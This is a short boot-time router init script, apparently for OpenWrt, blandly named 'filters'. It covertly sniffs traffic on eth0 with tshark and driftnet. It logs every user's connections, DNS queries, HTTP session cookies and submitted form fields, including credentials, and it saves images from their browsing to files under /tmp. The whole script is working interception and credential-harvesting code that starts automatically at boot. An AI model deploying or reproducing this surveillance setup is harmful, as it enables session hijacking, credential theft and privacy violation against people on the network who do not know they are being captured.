#!/bin/sh /etc/rc.common
# filters init

START=97

start() {
    # connections
    tshark -i eth0 -l -f 'not dst host 91.219.237.212  and not dst net 192.168.0.0/16' -T fields -e ip.src -e ip.dst | grep -v '^$' | while read L; do dns_lookup $L; done > /tmp/filter-connections.out &

    # cookies
    tshark -i eth0 -l -f 'dst port 80' -n -T fields -e ip.src -e http.cookie | grep -v '^$' > /tmp/filter-cookies.out &

    # DNS
    tshark -i eth0 -l -f 'dst port 53' -n -T fields -e ip.src -e dns.qry.name | grep -v '^$' > /tmp/filter-dns.out &

    # Forms
    tshark -i eth0 -l -f 'dst port 80' -n -T fields -e ip.src -e urlencoded-form.key -e urlencoded-form.value | grep -v '^$' > /tmp/filter-forms.out &

    # images
    mkdir /tmp/driftnet
    driftnet -i eth0 -v -a -d /tmp/driftnet &> /dev/null &
}

